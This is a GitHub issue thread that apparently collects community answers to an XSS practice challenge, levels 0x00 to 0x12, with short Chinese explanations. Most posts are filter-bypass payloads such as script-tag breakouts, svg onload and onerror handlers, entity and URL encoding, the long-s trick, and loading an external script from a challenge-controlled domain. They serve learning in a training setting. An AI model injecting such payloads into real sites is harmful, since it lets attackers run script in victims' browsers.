Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

答案 (一层楼一个,欢迎补充背景资料) #1

Open
haozi opened this issue Mar 19, 2017 · 46 comments
Open

答案 (一层楼一个,欢迎补充背景资料) #1

haozi opened this issue Mar 19, 2017 · 46 comments

Comments

@haozi
Copy link
Owner

haozi commented Mar 19, 2017

0x00

<script>alert(1)</script>
@vczhan
Copy link

vczhan commented Mar 19, 2017

0x01

</textarea><script>alert(1)</script>

@liutao
Copy link

liutao commented Mar 19, 2017
edited by haozi
Loading

0x02

"><svg/onload=alert(1)>

@jiangtao
Copy link

jiangtao commented Mar 19, 2017
edited
Loading

0x03

<script>alert`1`</script>

补了篇总结,年纪大了容易忘就记录下来咯

@haozi haozi changed the title 答案 答案 (一层楼一个,欢迎补充背景资料) Mar 19, 2017
@iMusic
Copy link

iMusic commented Mar 19, 2017
edited by haozi
Loading

0x04

过滤圆括号()以及反撇号` input.replace(/[()`]/g, '')

<script>window.onerror=eval;throw'=alert\x281\x29'</script

<iframe srcdoc="<script>parent.alert&#40;1&#41;</script>"

<svg><script>alert&#40;1&#41</script

@zhuweiyou
Copy link

zhuweiyou commented Mar 21, 2017
edited
Loading

0x05

><script>alert(1)</script>

@zhuweiyou
Copy link

0x06

type=image src onerror
=alert(1)

@zhuweiyou
Copy link

0x07

<svg/onload=alert(1)

最后加个空格或者回车

@pre1ude
Copy link

pre1ude commented Mar 25, 2017
edited
Loading

0x08

</style ><script>alert(1)</script>

</style > 逃逸正则

@pre1ude
Copy link

pre1ude commented Mar 25, 2017
edited
Loading

0x09 || 0x0A

https://www.segmentfault.com.haozi.me/j.js

构造符合正则的eval js url

@pre1ude
Copy link

pre1ude commented Mar 25, 2017

0x0B

<script src="https://www.segmentfault.com.haozi.me/j.js"></script>

html 标签, 域名 不区分大小写,path部分区分大小写,让evil服务器返回 J.JS 就可以

@pre1ude
Copy link

pre1ude commented Mar 25, 2017

0x0C

<scscriptript src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>

说明使用正则替换为空字符串来过滤标签是很不靠谱的

@pre1ude
Copy link

pre1ude commented Mar 25, 2017
edited
Loading

0x0D

 
alert(1)
-->

发现没有过滤换行符,可以换行过单行注释,但是代码不能正常运行,这里可使用 html 注释 --> 来注释 后面的js,使代码正常运行

@pre1ude
Copy link

pre1ude commented Mar 25, 2017

0x0E

<ſcript src="https://xss.haozi.me/j.js"></script>

这题需要解决两个问题:1. <s被正则替换坏了。 2. 大写的js无法正常运行.
解决方案:1. ſ 古英语中的s的写法, 转成大写是正常的S 2. 用外链的方式加载外部js

@pre1ude
Copy link

pre1ude commented Mar 25, 2017

0x0F

');alert('1

对html inline js 转义就是做无用功,浏览器会先解析html, 然后再解析 js

@pre1ude
Copy link

pre1ude commented Mar 25, 2017

0x10

'';alert(1)

@pre1ude
Copy link

pre1ude commented Mar 25, 2017

0x11

"),alert("1

@pre1ude
Copy link

pre1ude commented Mar 25, 2017

0x12

\");alert(1)//

" 被转义成 \" 经过html 解析后 里面变成 console.log("\") 会报语法错误, 再补个 \ 即可

@ArtemisZ
Copy link

0x12

</script>
<script>
alert`1`;
</script>
<script>

直接新建一个script标签里面包含alert1;

@liutao
Copy link

liutao commented Apr 20, 2017
edited
Loading

0x05

--!><script>alert(1)</script>

@lifangzheng
Copy link

0x06

onmouseover
=alert(1)

@mntn0x
Copy link

mntn0x commented Jun 7, 2018

0x0A
https://www.segmentfault.com/n/
1330000015188600/raw
直接在给定的网址https://www.segmentfault.com 注册账号,新建一个笔记,内容为alert(1),再调用这个笔记链接即可,记得换行

@secxm
Copy link

secxm commented Sep 6, 2018
edited
Loading

0x07

<input type=button onclick="alert(1)" 点击按钮
<img src=javascript: onmouseover="alert(1)" 点击图片

@CYJNM CYJNM mentioned this issue Nov 26, 2019
Closed
@mdly
Copy link

mdly commented Dec 11, 2019

0x08

</style
><script>alert(1)</script>

@chengyizhou147
Copy link

0x02

"><svg/onload=alert(1)>

"onmouseover="alert(document.domain)

@Kai5174
Copy link

Kai5174 commented Feb 7, 2020
edited
Loading

0x09 || 0x0A

https://www.segmentfault.com.haozi.me/j.js

构造符合正则的eval js url

0x09

https://www.segmentfault.com/" onload=alert(1)>//

@treadpit
Copy link

0x02

"><svg/onload=alert(1)>

"onmouseover="alert(document.domain)

"><script>alert(1)</script>

@c41vin
Copy link

c41vin commented Aug 17, 2020

0x07

<img src onerror=alert(1)//

@mtcz91
Copy link

mtcz91 commented Oct 4, 2020

<script>window.onerror=eval;throw'=alert\x281\x29'</script

你好,这句的原理是因为 = 报错所以弹窗吗

@TiffanyHYY
Copy link

0x09

https://www.segmentfault.com
  "></script>
  <script>
    alert(1) </script>

@bin-name
Copy link

bin-name commented Jan 3, 2021
edited
Loading

0x09与0x0A

https://www.segmentfault.com.haozi.me/j.js

补充一下,必须使用火狐浏览器,不知道为什么Google内核就不可以

@abab46abab
Copy link

abab46abab commented Jan 9, 2021
edited
Loading

0x09

http://www.segmentfault.com"></script><script>alert(1);//

@suix6
Copy link

suix6 commented Mar 23, 2021

0x04

@BypassNO
Copy link

0x05

--!><script>alert(1)</script>

@highwayMo
Copy link

highwayMo commented Jul 29, 2021
edited
Loading

0x12

</script> 
<script>alert(1)</script>

@highwayMo
Copy link

highwayMo commented Jul 29, 2021
edited
Loading

0x0E

<ſcript src="https://xss.haozi.me/j.js"></script>

这题需要解决两个问题:1. <s被正则替换坏了。 2. 大写的js无法正常运行.
解决方案:1. ſ 古英语中的s的写法, 转成大写是正常的S 2. 用外链的方式加载外部js

这个答案我在firefox和Google都不行了,因为url被大写后J.JS是找不到j.js的,所以我的思路是使用url编码来绕过正则过滤

<ſcript src="https://xss.haozi.me/%6A%2E%6A%73"></script>

@N0I0C0K
Copy link

N0I0C0K commented Sep 11, 2021
edited
Loading

0x9

随便写一个不存在的脚本, 然后写onerror事件, Google内核也可用

https://www.segmentfault.com/a.js" onerror="alert(1)

@upgiveup
Copy link

0x09 || 0x0A

https://www.segmentfault.com.haozi.me/j.js

构造符合正则的eval js url

0x0A现在有正确的答案吗

@haozi
Copy link
Owner Author

haozi commented Oct 18, 2021

0x09 || 0x0A

https://www.segmentfault.com.haozi.me/j.js

构造符合正则的eval js url

0x0A现在有正确的答案吗

重在思路,自己部署个域名好了,这个域名现在挂了

@jack-She1l
Copy link

0x0B

<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

@ffffff0x ffffff0x mentioned this issue Mar 7, 2022
Open
@quan9i
Copy link

quan9i commented Jul 9, 2022
edited
Loading

0x03

<a href=javascript:&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41>123</a>

@quan9i
Copy link

quan9i commented Jul 9, 2022

0X06

onclick
=alert(1)

@quan9i
Copy link

quan9i commented Jul 9, 2022
edited
Loading

0X09

https://www.segmentfault.com"></script><img src="" onerror=alert(1)>
https://www.segmentfault.com"></script><script>alert(1)</script>

@quan9i
Copy link

quan9i commented Jul 10, 2022

0X0A

https://www.segmentfault.com@xss.haozi.me/j.js
火狐浏览器可以

@feigezai
Copy link

0x09 ||0x0A

https://www.segmentfault.com.haozi.me/j.js
别给差评,外网跳转需要大概1分钟的时间。
狠狠地点赞。

@tong-ge
Copy link

tong-ge commented Jun 16, 2023
edited
Loading

0x03||0x04

<iframe src="javascript:parent.alert%281%29">

@a3510377
Copy link

0x10

'';alert(1)
alert(1)

Also available

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests